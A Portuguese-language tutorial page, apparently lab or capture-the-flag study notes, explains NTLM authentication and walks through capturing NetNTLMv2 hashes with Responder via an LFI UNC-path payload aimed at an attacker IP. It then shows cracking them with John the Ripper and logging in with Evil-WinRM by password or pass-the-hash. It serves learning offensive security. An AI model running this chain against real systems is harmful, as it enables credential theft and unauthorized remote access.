Skip to main content

Responder, NTLM e Evil-WinRM | Windows | SolydOne

  • Responder, NTLM e Evil-WinRM | Windows | SolydOne

NTLM — Fundamentos de Autenticação Windows

NTLM (New Technology LAN Manager) é um protocolo de autenticação da Microsoft baseado em challenge-response. Ele é utilizado quando Kerberos não está disponível ou não pode ser negociado.

É comum em:

  • SMB (porta 445)
  • WinRM (porta 5985 / 5986)
  • HTTP com autenticação Windows
  • LDAP

Fluxo de Autenticação NTLM

  1. Cliente envia usuário e domínio.
  2. Servidor gera um challenge aleatório.
  3. Cliente cifra o challenge usando o NTHash da senha.
  4. Servidor valida o resultado.

A senha nunca é transmitida em texto claro.

Terminologia Técnica

  • NTHash — hash da senha armazenado no SAM ou Active Directory
  • NTLM — protocolo de autenticação
  • NetNTLMv2 — challenge-response capturado na rede
  • Pass-the-Hash — técnica que reutiliza hash NTLM sem conhecer a senha

Responder — Captura de NetNTLMv2

Responder é uma ferramenta usada para executar ataques de LLMNR/NBT-NS/SMB poisoning e capturar autenticações NTLM.

Ele funciona criando um servidor SMB malicioso que responde às tentativas de autenticação da vítima.

Funcionamento do Ataque

  1. A vítima tenta acessar um recurso SMB.
  2. Responder intercepta.
  3. Envia challenge NTLM.
  4. Recebe challenge-response.
  5. Salva o NetNTLMv2.

Posteriormente, o hash pode ser:

  • Crackeado via brute force
  • Usado em ataques de relay

Exploração via LFI + SMB

Cenário típico:

  • Aplicação vulnerável a LFI
  • Inclusão de recurso SMB remoto
  • Força autenticação NTLM contra atacante

Exemplo:

http://target/index.php?page=//10.10.14.10/share

O servidor Windows tentará autenticar contra o IP do atacante.


Executando o Responder

Identificar interface:

ip a

Executar:

sudo responder -I tun0

Ou:

sudo python3 Responder.py -I tun0

Logs geralmente em:

/usr/share/responder/logs/

Formato típico do hash capturado:

Administrator::DOMAIN:CHALLENGE:RESPONSE:...

Crackeando NetNTLMv2

Ferramenta recomendada:

John the Ripper

Salvar hash:

echo "HASH_AQUI" > hash.txt

Executar brute force:

john -w=/usr/share/wordlists/rockyou.txt hash.txt

Se sucesso:

password : senha_encontrada

WinRM — Gerenciamento Remoto Windows

WinRM (Windows Remote Management) é protocolo baseado em SOAP que permite execução remota de comandos PowerShell.

Portas padrão:

  • 5985 (HTTP)
  • 5986 (HTTPS)

Permite:

  • Execução remota
  • Administração de servidores
  • Automação PowerShell

Evil-WinRM — Shell PowerShell Remoto

Evil-WinRM é ferramenta utilizada para explorar credenciais válidas via WinRM.

Instalação

sudo gem install evil-winrm

Conectar com senha

evil-winrm -i 10.10.10.X -u administrator -p senha

Conectar com hash (Pass-the-Hash)

evil-winrm -i 10.10.10.X -u administrator -H NTHASH

Funcionalidades do Evil-WinRM

Dentro da sessão:

  • upload
  • download
  • whoami
  • dir
  • type arquivo.txt
  • execução de scripts PowerShell

Exemplo:

whoami
type C:\Users\Administrator\Desktop\flag.txt

Fluxo Completo do Ataque

  1. Enumerar portas com nmap.
  2. Identificar LFI.
  3. Explorar LFI via SMB.
  4. Capturar NetNTLMv2 com Responder.
  5. Crackear hash.
  6. Conectar via Evil-WinRM.
  7. Executar comandos remotamente.

Comparação Técnica

Responder

  • Captura autenticação NTLM
  • Explora falhas de resolução de nome
  • Gera NetNTLMv2

John

  • Realiza brute force em hash
  • Suporta múltiplos formatos

Evil-WinRM

  • Permite shell PowerShell remoto
  • Suporta senha e NTHash
  • Facilita pós-exploração

Diferença entre RDP e WinRM

RDP

  • Interface gráfica
  • Porta 3389
  • Controle total de desktop

WinRM

  • Interface CLI
  • Porta 5985
  • Execução remota de comandos

Pontos Técnicos Relevantes

  • NTLM não transmite senha em texto claro.
  • NetNTLMv2 não é o mesmo que NTHash.
  • Responder não quebra senha; apenas captura challenge-response.
  • allow_url_include não bloqueia SMB.
  • Pass-the-Hash reutiliza NTHash sem conhecer senha.